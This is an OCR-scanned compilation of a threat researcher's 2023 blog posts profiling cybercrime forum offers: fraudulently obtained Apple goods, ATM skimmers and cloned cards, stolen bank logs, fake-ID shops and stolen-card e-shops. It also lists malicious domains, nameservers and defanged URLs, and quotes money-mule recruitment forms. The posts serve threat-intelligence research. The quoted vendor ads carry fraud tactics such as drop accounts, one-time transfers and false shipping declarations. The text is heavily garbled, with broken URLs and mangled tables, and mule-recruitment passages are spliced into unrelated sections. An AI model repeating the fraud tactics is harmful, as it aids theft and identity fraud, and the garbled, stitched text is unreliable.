hxxp://bafybeifukg3y6ktng4u3bhwtigo7w7kgy52|lbhsrtb2kgyxzc5ihzr22ba[.]ip fs[.]w3s[.]link 
hxxp://bafybeigpjhe4044q4cycljov3zzkdl2ryjvv57Imr5pvekgtjye7budrxil.]ip fs[.]w3s[. ]link 
hxxp://bafybeicqu6ecliqdjlu6h6q45voumkz6oef5qbgsakuymiaovt2ft6qtzie[.Jip fs[.]w3s[.]link 


hxxp://bafybeibucwomwhuava46rcskf7vp56lb2eekoqbg636t3nkfmizzysgryel.Jip fs[.]w3s[.]- 
link 


Stay tuned! 


. https: //blogger .googleusercontent . com/img/b/R29vZ2x1/AVvXsEDGibwdUZOumTIeh1Pn1fRoEOnb16QQbo_q8MnCT37ys0Zn 
. https: //blogger .googleusercontent . com/img/b/R29vZ2x1/AVVXsEhc3ih1Nj 2WUSpMG-XhmdmHuHp 1 jUePdVSGh6YN_o2W5WJ_d 
3. https:/ blogger. googleusercontent.con/ing/b/R29v22x1/AVWKsE)NBKT@vh IjRaswgT_ SWCGRINFIG:YaTpt=s0Sy GLP 


ome) 
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19.3.3. Dancho Danchev’s Blog and Twitter Account Ebook Formats - 2019 - 2023 
Research Compilations Available (2023-03-07 22:55) 


ke 


[1] 


DY Dancho Danchey 


Dancho Danchev's Blog - 
Official E-Book 
Compilation Archive - 
2019 - 2023 


Nttps://ddanchev blogspot.com 
Email: dancho danchev@hush.com 


Hot off the press. 
- [2]Dancho Danchev’s Blog Official Ebook Compilation Archive - 2019 - 2023 
- [3]Dancho Danchev’s Twitter Ebook Archive - 2017 - 2023 


Full portfolio of research circa 2005-2023 in various Ebook formats available [4]here for free. 


Enjoy! 


1. https: //blogger.googleusercontent.com/img/b/R29vZ2x1/AVVXsEgRuo44F gd3ivMi j9tkp77iTJKvVGQA1s0f eqgAONhJat44p 
84qgFR81IYdTzDrLKxY9VgGUryZIf4IsSzVNQDBwwe4m0istwO8RY11q 

2. https: //archive. org/details/dancho-danchev-blog-ebook-2019- 2023-02 

3. https: //archive. org/details/dancho-danchev-twitter-ebook-archive-02 

4. https://archive.org/details/@ddanchev 
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19.3.4 Cybercriminals Offer Apple Themed Discounted Products For Sale On Major 
Cybercrime Friendly Forum Community - An Analysis (2023-03-18 06:15) 


[1] 


I’ve recently came across to a currently active underground marketplace forum proposition 
that’s basically offering and selling Apple themed products which appear to have been ob- 
tained and purchased using fraudulent means. The seller also appears to be using several 
techniques to actually safely ship the products basically everywhere and is using another ser- 
vice to guarantee the payment and delivery of the products. 
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Sample screenshots include: 


[2] 


[3] 
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] 


6 


[ 
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[7] 
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Sample underground forum proposition: 


"The product is only original, packed, new! Absolutely the same as in the store, only cheaper! 
— Apple products are a priority and are always available at the drop, the prices for it are 
fixed and are indicated in the price list below. — We send it anywhere. — In order to protect 
ourselves and you, we will work only through the guarantor such as forum escrow “We can 
overpower any volume.” — The goods pass the customs control without problems, sending 
on the left waybills. — Sending goes from my drop, take on SAFE, there is no risk! — When 
ordering from $1000, a nice bonus in the form of an additional device! — | always give the 
track number! (number to track the parcel via the Internet) — All GSM devices, neverlocked, 
will work with all telecom operators! *Dear Clients! Read carefully all that is written below, here 
all the conditions and nuances [Payment] — The minimum order is from $180. — We work only 
through the guarantor escrow of the forum! — Write to the Forum guarantor the application as 
indicated in its topic. — After you deposit funds to the guarantor, immediately write to me, we 
will process your order. After sending, | give the track number. — Major transactions in priority, 
we process them faster and more efficiently. [Delivery] — Delivery by mail DHL or Fedex (we 
can consider other companies), anywhere in the world, no longer than 15 days. Usually 7 
days. — The delivery is included in the price of the goods! — Before we write, please read 
the topic, you will find answers to many questions. — If you do not answer immediately - do 
not panic. we receive high volume of emails and orders. — Subject for feedback, all questions 
in the PM! Recently, unscrupulous schoolgirls are thrown on different shit forums and social 
networks, impersonating Serbs, therefore, when uploading photos to the forum, watermarks 
are automatically applied. Operating since September 2011. Building a good reputation is one 
of my values - | will always do my best to surprise and stay reputable. All iPhones are sent 
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undamaged in their original packages. It takes 2-4 business days for the products to reach any 
location within Europe or North America and up to 6 days elsewhere in the World. All of the 
iPhones come in stealth packaging, declared as items of lesser value. You don’t have to worry 
about customs taxes as it will already be PAID for by us. Trusted. Safe. 100 % Satisfaction 
guaranteed.“ 


Stay tuned! 


1. https: //blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsEhbvHOFCqznIn4VX-W4L1i412UU_Awt70ueSohyuJ8TNe2Tj 


2, https: //blogger. googleuserconvent. con/ing/b/R20v22x/AVwXeE B41 THCZSOMus2ar 2H gMEDOFGoS4i@xekS KIL }TR 
3, https://blogger. googleusercontent. con/ing/b/R20v22x/AVwKsEixcIST kblObe_ Tali XagtCxSkvtuiP6ED1¥Gyaq90Cy 


5, https://blogger. googleusercontent.con/ing/b/R29v22x1/AVWKsEiZenhPCu2KonTePvauiWT1CéedgTteUe6 jNagdansFBoc} 
. https: //blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsEg23rWxPJDSMLNOp30FH1db7gBmdwmldztd34m4D8cOSEOru 
. https://blogger . googleusercontent . com/img/b/R29vZ2x1/AVVXSEiBA7UY 1BA JPQQSO_XJuLvSc6M-21Z0XdpNYsHx1qRngzv44 
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19.3.5 Profiling a New Vendor of ATM Skimming Devices and Stolen Credit Cards 
Information On A Major Cybercrime-Friendly Forum Community - An Analysis 
(2023-03-18 06:19) 


eR 


[1] 


archway-groupinc .cn 
cosco-groupmain .com 
integrity-groupinc .cn 
integrity-groupsvc .cn 
massive-groupsvc .cc 
premier-groupinc .cn 
premier-groupnet .cn 
prime-groupco .cn 
prime-groupinc .cn 
puritan-groupinc .com 
redeye-groupco .cn 
redeye-groupinc .cn 
regency-groupco .cn 
regency-groupco .com 
regency-groupnet .cn 
saturn-groupsvc .cn 
saturn-groupsvc .com 
vision-groupinc .cn 


DNS servers of notice: 

ns2.dummykeath .cc 

ns2.theblackend .cn 

ns1.full-controll .cc 

ns3.geniouspartner .cn 

ns3.theblackend .cn 

ns1.party-reunite .cc 

ns2.bubble-preorder .info 

nsl.windcontrol .cc 

ns3.diamond-dream .cc 

ns.partnergreatests .net 

one.goldwonderful9 .info - the [39]command and control server used by the botnet managed 
by a money mule organization was using the same nameserver in May, 2009 
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I’ve recently came across to a currently active underground marketplace forum proposition 
that’s basically offering and selling ATM skimming devices and stolen credit cards information 
where the seller of the devices and the information is basically offering a variety of screenshots 


to demonstrate the existence of the service. 
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Sample screenshots include: 


[2] 


[3] 
26714 


cae 


Sample underground marketplace forum proposition: 


“USD/BTC Mid-Balance Clone Card (Price: $260) High-Balance Clone Card (Price: $400) Super- 
High Balance Clone Card (Price: $875) Card Balance $1,300 (Min) — $2,500 (Max) $2,500 (Min) 
— $4,000 (Max) $5,000 (Min) — $8000 (+) ATM Withdrawal Limitation $1,000/day (2 Sessions 
of $500) $1,000 — $1,500/day (2-3 Sessions of $500) $3,000 — $4,500/day (6-9 Sessions of 
$500) Banks Chase, Charles Schwab, Capital One, & PNC Suntrust, Citi, Wells Fargo, BB &T, & 
PNC Goldman Sachs & Private Personal Banking Card Type Debit Card, Bank Issured (VISA & 
Mastercard) Debit Card, Bank Issured (VISA & Mastercard) Debit Card, Bank Issured (VISA & 
Mastercard) PIN Four Digit Pin, Overlay Pin Transmitted (Multi) Four Digit Pin, Collected from 
Overlay POS/ATM Four Digit Pin, Collected from Overlay POS/ATM Data Acquisition In-House 
Skimmers & Skimming Network In-House Skimmers & Skimming Network Skimming Network, 
Subordinate, & Private Sale“. 


Stay tuned! 


1. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEij IMDwu_HXvxAa9zEgZMgKCgZMw1hBG19K8yM5dtB2in90f 
XucOOODKiI7 Imkk4axf gTBjuiBFVxqikKbGUAPIAQE24HNhJ-mhLTT 
2. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEgx87 QpyC5VgN78Ph7 1EnI JbXWOw12PeWAQY1PLbcTXenWWk 
ZKR9OOxA3waft TEBsf£f£X2_YhVYtQReYZ5vXehg3lylbxYeLBLgk8cArp 
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3. https://blogger. googleusercontent .com/img/b/R29vZ2x1/AVVXsEiN3Bsv7x9FrutMXjwSQjq8_TpqHxiLulimSsTGDQHL7GXLf 
hCa2R0zw0ZQ3jT7qvSouSgI4-uikW91NOxxgqyBtsKLsMpxCN70Hgz 


19.3.6 Profiling a Currently Active Vendor of Western Union and Banking Logs In- 
cluding Stolen Credit Cards Transfer Details - An Analysis (2023-03-18 11:18) 


Zo 


a 
1 ee a 


I’ve recently came across to a currently active underground marketplace forum proposition 
that’s basically offering and selling Western Union and banking logs including stolen credit 
cards information where the seller of the information is basically offering a variety of screen- 
shots to demonstrate the existence of the service. 
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Sample screenshots include: 
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[3] 


[5] 
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] 
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[ 
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[7] 
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Sample underground forum marketplace proposition: 


“My team specializes in stealing financial data such as credit cards, bank logs and other finan- 
cial instruments from hacked databases such as e-commerce websites and spam for card data 
using email skimming/phishing, SMS and website fake login pages to extract card and bank 
information from victims. We use this data to transfer funds to you using western union, Mon- 
eyGram, bank transfers and cash app, etc. We use westernunion.com and moneygram.com 
to place an order to your pickup info and order using the victim’s cc data. We can also do 
bank transfers (wire) to any bank globally as we have data from all countries in our logs. This 
is fraud and illegal, so anyone wishing to use this service should take precautionary steps or 
contact me for essential advice if you’re looking to get some easy money. | recommend doing 
these transfers only once per account/name as it gives a higher percentage that your accounts 
won't be locked afterwards or, ideally, use fake IDs/drop accounts. We sell on multiple dark 
net tor marketplaces. You may find us on other marketplaces.“ 


Stay tuned! 


1. fttpa:/ blogger. googleusercontentcon/ing/b/RDOVZ2x2/AVwKsEgCYA Guy BrP a Uel4 [sb RoAQuMipiNAEc3qS30 VINEE 
2. hvepa:/ fologger .googleusercontent.con/ing/b/R29v22x1/ AVWTSENBSZjyEyeAGvace®9_CjEXQEBQITTsHradRgiDPoIDNRIAR 
3. hepa: / ologger .googleusercontent.com/ing/b/R29v22x1/ AVWEaEiL3giitw_sXG3H27br= MAD lipiTKoeWOxIih NDE 
4. hetps:/ blogger googleusercontent.con/ing/t/R20v221/AVWTsEAO__060qSqqpdbviv Yd ADI Ea: WOxGvDaCObRENP72 


5 
. https: LO eee ee googleusercontent. com/img/b/R29vZ2x1/AVvKsEjPFNjtTG4jC_ Fu0kh_XPcVogBbzxEgwZwpf5_28ESv7thCp 
7 


19.3.7 Profiling a Newly Launched E-Shop For Fake IDs/Documents and Certificates 
- An Analysis (2023-03-18 11:22) 


[1] 


Registration 


I’ve recently came across to a newly launched E-Shop for fake IDs including personal documents 
and certificates which offers a variety of some pretty informative infographics on the topic of 
how to obtain and actually purchase a new identity based on a variety of countries. 


Sample photos include: 
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@2eq2020°29d 


Why are you gathering so much information about applicants? Such attention especially to bank account details puts me on guard. 


nm. Analyzing all the details 


“You are responsible for reliability of this information. If you're having any difficulties please contact your bank 


Banking Details 


Account Type*: Personal v 
Bank Name*: 

Account Type (checking/saving)*: - select - v 
Name on the Account™: ? 
Account Number*: e 
Routing Number for ACH transfer*: ? 
Routing Number for Federal Wire ? 
Transfer*: 

Date you opened your bank account*: ? 
How often do you use your bank ? 
account?*: 

Average amount of each operation*: 

Is it @ prepaid account?*: 

Daily véthdraval limit over the 

counter™: : 
Have you ever used Western 

Union/Money Gram?*: 

Are there Money Gram offices in your ? 


area?*: 


tack 


Once the end user falls victim into the recruitment scam, the entire process of registration and 
communication with the bogus organization takes place through a web-based interface where 
the potential money mules has to not only provide detailed personal data, but also, as much 
information as possible that would help the cybercriminals better achieve their objectives. 
For instance, the template for the money mule registration process includes a self-answered 
question which even the average user can get suspicious about - Why are you gathering so 
much information about applicants? Such attention especially to bank account details puts 
me on guard. 


The money mule recruitment organization is sticking to its professional tone, as usual, 
and explains that: 

"In fact that modern financial system is a complex instrument, which controls financial streams. 
The problem is that any transfer may be delayed (from 1 to 5 days) but it is unacceptable 
for our business. Transaction should be completed by a financial manager the same day 
money is deposited into the bank account. Otherwise, we risk to lose money, clients, 
reputation. Analyzing all the details below we’ll be able to prepare tasks for every 
agent individually. Please fill in all the fields carefully to avoid delays while working with 
your bank. The success of our cooperation depends on the accuracy of entered details! Please 
be serious." 
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The minimum cost of 


eo starting a new life 


- 
m+ 
* 


CANADA AUSTRALIA EUROPE 


1200$ 1400$ 


500-1000$$ 500-1000$$ 500-1000$$ 500-1000$$ 
5000$=700S {| S5000CAS = 700S§5000AUS = 700$f SO00£ = 700$ 


1100$ 
500-1000$$ 


5000€ = 700$ 


73508 menos [| 2asas 7300s 


} New identity includes Passport, ID Card, and Birth Certificate 
@ Education includes High School Diploma and Bachelor's Degree 
© Finance includes Bank Account, Credit Card. and 5.000 of Counterfeit Currency 


[3] 
The cost of a passport 


Europe 


US$750* 


Canada Australia 


US$745° US$745" 
USA 


US$850° |_t» 


* Average Price 


[4] 
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THE COST OF 


A new life in Europe 


Cost of a new identity: 


Passport - Starting at US$600° 
ID card/Driver's license - Starting at US$305* 


Birth certificate - Starting at US$220° 


© Cost of a new financial profile: 


PayPal account Bank account 
Starting atUS$125 Starting at US$70 

son funds 
Credit card Fix your credit history 
Starting at US$45 Minimum US$200 


Counterfeit money 
€5,000 co US700S 


6 Cost of a new background: 


High School Diploma Certificates (any kind) 
US 500$ US 400$ 


Bachelor's Degree Fix bad grades (college) 
US 700$ US$1,200-US$3,750 


Master's Degree Guaranteed Acceptance 


US 1000S to College- US 4300S 


[5] 


oO SUMMARY 


The minimum cost of starting a new life 
inEuropeis US 3050 


That inclu 
New identity 
$81,125 
Education 
US 1200$ 
Finance 


US 8005S 


~ 


rs 
@ = THECOsTOF = ; 
¥ A new life in Canada 
<a_b> 


a) Cost of a new Identity: © Cost of a new financial profile: 


Passport - Starting at US$660" PayPal account Bank account 
ing atUS$125 Starting at US$70 

ID card/Driver’s license nrene 
Starting at US$275° 

Credit card Fix your credit history 
Birth certificate Starting at US$45 Minimum US$200 
Starting at US$240° 

Counterfeit money 

CA$5,000 costs USS700 


The minimum cost of starting a new life 


in Canada Is 


a) Cost of a new background: 


New identity 
- teID oF 
US$1,175 


High School Diploma Certificates (any kind) 


$50) USS400 
USSSOO 2400 Education 
Bachelor's Degree Fix bad grades (college) Hie i 200 
SSi UU 
US$700 US$1.200-US$3,750 ey 


Finance 
Master's Degree Guaranteed Acceptance ‘ 


US$1,000 to College - USS4300 USS$800 


[6] 
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A new life in the UK 
<> | 


oO Cost of a new identity: © Cost of a new financial profile: 


Passport PayPal account Bank account 

Starting at US$710" Starting at US$125 Starting at US$70 
depends on funds) 

ID card/Driver's license Credit card Fix your credit history 

Starting at US$305* Starting at US$45 Minimum US$200 


Birth certificate Counterfeit money 
Starting at US$240* £5,000 costs US$700 


sr) Cost of a new background: 


High School Diploma Certificates (any kind) 
USS500 USS400 


Bachelor's Degree Guaranteed Acceptance to 
USS700 College - USS4,300 


Master's Degree Fix bad grades (college) 
USS$1,000 US$1,200-US$3,750 


at inchucte 


6 New identit 


Passport +10 + 


The minimum cost of starting Education 


High Schoo! [ 1+6 Des US$1200 
a new life in the UK is 


Money 


[7] 
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@ =‘ THECOsTOF > 
A new life in Australia 
ay 


© Cost of a new identity: © Cost of a new financial profile: 


Passport PayPal account Bank account 
Starting at US$660" Starting at US$125 Starting at US$70 


Jepends on f 


ID card/Driver’s license Credit card Fix your credit history 


Starting at US$420 Staring at US$45 Minimum US$200 


Birth certificate Counterfeit money 
Starting at US$275" ‘ AU$5,000 costs US$700 


Bo SUMMARY 


* 


The minimum cost of starting a new life 
in Australia ls USS3,300 


That includes 
6 Cost of a new background: 
New identity 


Passport + 1D + Birth certificate 


High School Diploma Certificates (any kind) 


USS 


USS500 USS400 : 
Education 
High Schoo! Di plor 


Bachelor's Degree Fix bad grades (college) 
USS700 US$1,200-US 0 US$1,200 


Finance 
Master's Degree Guaranteed Acceptance Bank Account + 


US$1,000 to College - USS4,300 USS800 


[8] 
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The cost of a European 


[9] 
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PE THE costor | = 


- Anew life in the USA @y 
©) Cost of a new identity: é) Cost of a new financial profile: 
Passport - Starting at US$710 PayPal account Bank account 


Starting atUS$125 Starting at US$70 
ID card/Driver’s license Gepends on funds) 
Starting at US$200 

Credit card Fix your credit history 


Social Security Number/Card - US$2-5 Staring at US$45 Minimum US$200 


Birth certificate - Starting at US$240 Counterfeit money 


US 5000 costs 700S 


2 eas 


=_—r =. 

2 > 
Ir "Ey Bi) SUMMARY 

7 The minimum cost of starting a new life 


in the USA is US 3150S 
© Cost of a new background: 


That includes: 


New identit 
High School Diploma Certificates (any kind) Pita owe th Certificate) 
5005 400$ US$1,152 
4 Education 
Bachelor's Degree Fix bad grades (college) (High School diploma + Bachelor's Degy 
700$ US$1,200-US$3,750 US 12005 
Finance 
Master's Degree Guaranteed Acceptance (Bank account + Credit Card + Counterteit money 
1100S to College - 4300S US 8005S 


Sample underground forum market proposition: 


“Identity card / social security card - A passport will only provide an opportunity to enter the 
country, but in order to be considered a fully functioning member of society, documentary 
evidence that the person is a resident (or citizen) will be required. Each country has its own 
specific forms of identification, but all use a driver’s license as their primary ID card. Therefore, 
both documents are necessary for those wishing to obtain a new identity. “Birth certificate - 
This document is necessary to substantiate your citizenship by birth: to be able to prove the 
fact of birth in this country and that the name, date and place of birth correspond to the 
new identity. As is the case with real citizens, this is an important document when purchasing 
various government services.” “Education and qualification documents. The key element of the 
new personality is the person’s fake general and professional education. These documents help 
start a new life - create a completely new backstory with which you can already get a job and 
find a community. Among the documents about education, we make diplomas of secondary 
education, bachelor’s and master’s degrees.” “Financial documents and services. Creating a 
new financial profile is another step towards creating a new personality. Anyone can update 
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their financial status with new bank accounts, payment cards, credit scores, and even new 
PayPal accounts. All of these solutions, again, come from a wide variety of sources. Some 
bank accounts have been stolen, others are legitimate.” “Estimated cost of a new personality 
by country: USA The cost of the minimum package is $ 3150.“ 


Stay tuned! 


1. https: //blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsEh1XvLmGHBMzD-LYpI JJrwz_laAccHalwYPXH4k0Q48M1Kj2 
Q-Y12gYS7g-BSf0h- qORD9rEcVzZ17ND3i4Nrt1tRoDJvwwGBOgXxTLA 
2. https: //blogger . googleusercontent . com/img/b/R29vZ2x1/AVVXsEhF gLsxKMS22BMx4MwXt 9M- 4KeSPr4QTbVhTboo5BBlg_td8 
UOtTPbMLMjR1loonZH7EpXxgUmZMGP- gXw1iSK_5FJA__SriYkmFiN1Z 
3. https: //blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsEiuNZ_VZUOuWXyPa2Kcci-8FnU9- 1WtHdSww4qs1PNwNItwr 
FMQ-mLj YuuLr_MeQyoUaLhkKTZs_z2U2vGitXFF2TYPegRebORSKpGq 
4. https://blogger .googleusercontent . com/img/b/R29vZ2x1/AVvXsEhp5 jZzzzzuESVC8gZaJMYfiztig0OY2rybugrkPuJr5Eugv- 
kam937dqR8egTolX3mZ7hjzqJHr5FonCxeBkEgRjNWxe4rYId94p0q 
5. https: //blogger . googleusercontent . com/img/b/R29vZ2x1/AVVXsEiS10bwX12Jvajv9-ApGxj-EToCxYMQKXopu4zY5xJdKytHV 
cwl4VNZ_KIMtbLyL5f jKOoJ-OQqgXSek1lwUHQBoQrckcSmhDwxVwrn 
6. https://blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsEg7mQwyh5N1gf1YCKxutFEL4RI1f 2F6--RKUtH1hYGv_RLLaE 
4Lf£S jrMIGOZMZECSqF qRVVNrG6Y j TUNJFAhsOaYNp1n18BichYwmQ4 
7. https: //blogger. googleusercontent.com/img/b/R29vZ2x1/AVvXsEjrk7gtC97FMmEhNOeKeAANc1LidJ3DPzuCVOo5nLax394ho 
aVzdDzf 3evFquJxVfCuUI3nhbh3hA- VNOTqdyqWoYz2FRxVOZB1x-Z 
8. https://blogger. googleusercontent .com/img/b/R29vZ2x1/AVvXsEgD81£tPnBzsmFnwDXt jhDinQ1S1kK57ZrF JPhnNSPoKAMcd 
K_9YGH3JWO_P5N_eqDo703XdtwR9B11KqfixXpL54LDx2QSw1lV1iLu-0 
9. https: //blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsEh5ugwCSFg1Vg8pkBysz_uQJoqJIdi81F3-S03Z2gG9gNY6b 
8ABHIAHzo7UUshM1rky j wv 7G9ZbGiB12qWv556r0MEwB2Pv1UAGybx 


19.3.8 Profiling a Newly Launched E-Shop For Stolen Credit Cards Information - An 
Analysis (2023-03-18 11:34) 


[1] 


Buy $17.80 
Buy $15.50 


Buy $15.50 


Buy $17.60 


I’ve recently came across to a currently active E-Shop for stolen credit cards information that’s 
currently syndicating and offering access to a multitude of stolen credit card details courtesy 
of various underground marketplace vendors of stolen credit cards information and is currently 
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offering a pretty interesting and massive portfolio of stolen credit cards information which 
everyone can basically purchase. 


Sample screenshots include: 


[2] 


nologs =o 


Cards 


INFORMATION 


[3] 


Code: 2781 Baki + 


Code 200 Baki + 


including PIN 


Code: 200 Baki + 


neludieg Pi 


Code 200 Baki + 


tieluding PIN 


Code 281 Baki + 


Coder221 Waki + 


[4] 
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C + Address 


Buy $17.30 
Refundable: YES 


C + Address 


Buy $17.60 
Refundable: YES 


CC + Address 


Buy $20.50 
Retundebte: YTS 


CC + Address 


Buy $20.80 
Retundabte: YTS 


CC + Address 


Buy $15.80 
Refundable: YES 


CC + Address 


Buy $18.90 
Refundable: YES 


CC + Address 


Buy $16.50 
Refundable: YES 


C + Address 


Buy $20.50 
Returdette: YTS 


Sncrypt 


Apollo 
Buy $20.80 


Cards” 


Lincoln CC + Addvess 


Buy $20.80 
Returciatee: YES 


Luigi 


Proeninert CC + Addivess 


SSN + MMI + Phone Buy $22.60 
unico 


Retumdatee: YES 


VeePopuli 


Buy $25.90 


CC + Adkiress 
MMN 

Buy $20.80 
NIN 
Phone 

Buy $20.80 
SSN + MMN + Phone 
Track 1 


Retundable Buy $22.60 


Buy $25.80 


Stay tuned! 
26732 


— f i 
a wy | . 


@2@2O@2O02O 


I confirm that I have contacted my bank directly and verified that: 


()_ my banking information (Account and Routing numbers) are correct. 

‘a my daily withdrawal limit is in fact $10,000. 

ia} my current account listed is active, as it may become inactive due to inactivity. 
CO) my account is able to receive funds on daily basis in the amount of $10,000. 


In addition I certify that: 
0 there is a branch of my bank located in my city/town and I am able to get there soon after task 


receipt. 
0 there are Western Union and Money Gram locations in my city/town and I am aware of their exact 
addresses. 
Next Step Back 


*if you have any doubts or concerns to the above statements, please post-pone your registration until all of the information is 
verified. You carry full liability for providing falsified information. 


**Please bear in mind the Confidentiality Clause in your Agreement when contacting outside parties for information. 


It gets even more interesting when the recruitment organization starts starts exposing itself 
as a cybercrime-facilitating enterprise, asking questions that only such an organization 
needs to known the answers to, due to operational security (OPSEC) and due to their clear 
understanding of the time value of money ([40]Microsoft study debunks profitability of the 
underground economy), well stolen money in particular. For instance, the built-in registration 
checks speak for themselves: 


- We don’t work with recently opened accounts. For safery reasons your bank account 
must be 90+ days 

- Average number of operations per week required 

- Unfortunately we don’t work with prepaid bank accounts 

- Maximum amount you can withdraw in branch daily 


The recruitment organization is clearly aware of basic quality assurance concepts, due to 
its surprising tactic used for monitoring the transaction process for each and every money 
mule working with them. How do they achieve this? By offering a $100 financial incentive 
as a bonus for each and every money mule that provides the bogus company with access to 
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1. https: //blogger.googleusercontent .com/img/b/R29vZ2x1/AVvXsEiD1NalIzTxCT8CkZcJrrdluTqyF- vz5aEuHT4FnkG9XBAHT 
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VaMJOnOdIjPwd6Ir4bFFAuZ-ajG6dPFVme9D1ih4awb1VStP6QPave 
3. https://blogger .googleusercontent .com/img/b/R29VZ2x1/AVvXsEj31c8UAsOtDxIEhbtKBx1laUk3mPfSzNvhAQReVEX661bpz6 
SQ9vy9oncXZcmu9JB10hB13s6DH81pL1vHYugOXx9D4oMZ65hS8spF 
4. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEgtg891Gvoak3Jn1w3wZt yBoLNLVEMV1H_kaq6EbLI7eevTu 
BYKLWKEN4vK__SMJfnpxxMxXV8epAbDEToPxfwPJsV50_E50wZJIHx 
5. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEgDnEKcO1hRLIBNbtPY3DDuxLef fqnYwENvpDGSTgnXRr8z j 
4x3umIo2QyHYoqnu3whTsX- JSk1ArypsCHrRiSFii68G2zzkiD4c73 
6. https: //blogger. googleusercontent.com/img/b/R29vZ2x1/AVvXsEixtC-MD06s_X71nj69ikzdDMnwkZYLinbVc6-nmG-Zrvhw2 
hgbbgye3ErghCC0e1lvbLkPu301qwW03jHKOmJZO9DQir5TOtWKzmgsSI 


19.3.9 Profiling a Newly Launched E-Shop For Stolen Credit Cards Information - Part 


Two - An Analysis (2023-03-18 11:37) 


[1] 


LtimateSho 


register for new user 


I’ve recently came across to a currently active E-Shop for stolen credit cards information that’s 
currently syndicating and offering access to a multitude of stolen credit card details courtesy 
of various underground marketplace vendors of stolen credit cards information and is currently 
offering a pretty interesting and massive portfolio of stolen credit cards information which 
everyone can basically purchase. 


Sample screenshots include: 


[2] 
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uRshopSurht6jl6g7 r2vgphetaccikxgo4k25tnj4g7 himi4bSmpi_onion 


Ultratresaoe 


Uleratreshts 


xP_2 
BIoseos 
Ultratreshss 
Gesies42 


Gesies4t 


CREDIT Canadadobd S$airt- - LA FEOERATION 

CLASSIC Georges OES CAISSES 
DESJARDINS DU 
QUEBEC 


DEBIT SALESBASE2 BAY FIRST BANK 
PREPAID NA 


DEBIT 


CREDIT r Gertusi2 Pennsyivania Pittsburgh en CREDIT ONE 
CLASSIC BANK NA 


neck rules For bidcing 


Bids-x 


Uttratreshas 


Ultrafreshde 


Stay tuned! 


1, https: / blogger, googleusercontent .con/ing/b/R20v22x1,/ AVwKsEiPDks5 23 JDGPPZQBO0TReP AQUI] SYHiOTELyo4-SDUpaR 
2, https: / blogger. googleusercontent .con/ing/o/R29v22x1/ AVwKsEjo1-Givi4875_BALdLLncWGyD7eUsukeiiySGETUARPayTs 
3, https: //blogger.googleusercontent.con/ing/>/R28v22x1/AVwXsBgosZuDepiTalivSivLUzwsdNDNeDz4ylpoVRGv9pSHTRVL 
4. htps://blogger..googleusercont ent. on/ ng/b/29vZ2n1/KVvksBalvh-#V08QOS IbKLTETFTVOST:~oBv_DIV-VgBbAV=AvZ3 
5, https: / blogger. googleusercontent .con/ing/b/R29vZ2x1/ AVvKsEgyBefTAGFSPyERYAVXPRc_P_PT-witzwiy4A_ OTL 


19.3.10 Profiling a Newly Launched E-Shop For Stolen Credit Cards Information - 
Part Three - An Analysis (2023-03-18 11:44) 


he 


[1] 


Firsthand 


Don't have an account? REGISTER HERE! ; 


*/~ 


Fi Remember me 


- 


Log InNow > 


Forgotyour password? 


I’ve recently came across to a currently active E-Shop for stolen credit cards information that’s 
currently syndicating and offering access to a multitude of stolen credit card details courtesy 
of various underground marketplace vendors of stolen credit cards information and is currently 
offering a pretty interesting and massive portfolio of stolen credit cards information which 
everyone can basically purchase. 


Sample screenshots include: 


[2] 
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OFirstHando — 


During the last month we have been working hard and 5 plement Ubet wives cheae it Sts'ver ‘Site infrastructur 
nit gateways have been ir: $ and everything has been moved sur fully 
~ parch functions have been implemented with filters and varietion 
Mobile application U! Improved 
Members TSC have been upd 1 aed Uve rambing sy om has been changed. Older ing J remain eveileble for every a 
Need Amt DDoS frew efhiguration implemented. DDoS attacks migy 4 


BIGCC DATABASE UPDATE. EU # UK. VALID RATE: +88% 


pert EU +UK 
nfo: Full Address + Date of Birth 


Valid Rate: +B8% 


[3] 


CREDIT CARDS 


Search BIN Search ZIP 


Mark BANK Tags » Country 
COMES 
MARK BIN BANK EXP zp COUNTRY REFUND/SELLER inna PRICE CART 
377278 
Addr ass. 
CREDIT AMERICAN EXPRESS UNITED 
aren : . 05/23 ananne Email, $23.50 *ADD 
= * NM 7 mn 
CONSUMER US CONSUMER STATES SSN. IP 
LENDING 
539634 
DEBIT BOFI FEDERAL NITED Refundat Aces 
<jopefoe! a 04/24 «= 72901 Sas seeteslnragitnl See Email, $21.80 +ADD 
| 2 PREPAID BANK STATES Seiler: ShadoWeb SSN. IP 
RELOADABLE 
— at vt Me RI 
| a CANO pet ere sea ee 
VISA DEBIT DE FINANZAS 12/23 22482 PERL $20.30 +ADD 


CLASSIC SAEMA 


[4] 
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CREDIT CARDS 


Search BIN Search ZIP 
Search Q Search Q 
a 
—) AMEX 
\ DISCOVER 
) MASTERCARD 
© UNKNOWN 
VISA 
| 2) Deer BOFI FEDERAL 
PREPAID BANK 
RELOADABLE 
498503 ne 
INTERAMERICANO 
DEBIT DE FINANZAS 


CREDIT CARDS 


Search BIN 


Search 


Q 


_—— = —A me 


~ 


} 
e 
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0 


0 


ASTCOMMUNITY CU. 


ISTMIDAMERICACU. 


4FRONTCU. 


SSTAR BANK 


) AS, 


AB DNB NORD BANKAS 


ABA BANK 


© ABANCA CORPORACION BANCARIA 


Exp ZIP COUNTRY —— REFUNDY/SELLER pe PRICE CART 
Address, 
: SSN, IP 
Address 
UNITED Refundable - 
424 72901 states Seller:ShadoWeb Sor, $21.80 
12/23 © 22482~=Ss PERU pe =e wn Aaidress = $20.30 
[5] 
" 2 COUNTRY —REFUND/SELLER STS = PRICE CART 
Acdr ess, 
UNITED Refundable 
55361 states Seller: ShadoWeb ron $23.50 
Address, 
UNITED Refundable 
72901 STATES Seller: ShadoWeb a $21.80 
eee PERU Soler Seas Address = $2050 


[6] 


CREDIT CARDS 


Search BIN Search ZIP 
Search Q Search Q 
Mark ¥ BANK ¥ Tags ¥ Country ¥ Apply Reset 
MARK BIN D- DUNTRY —_REFUND/SELLER cag PRICE CART 
) Address 
377278 a 
CREDIT Address, Email, SSN, IP NITED Refundable Jae 
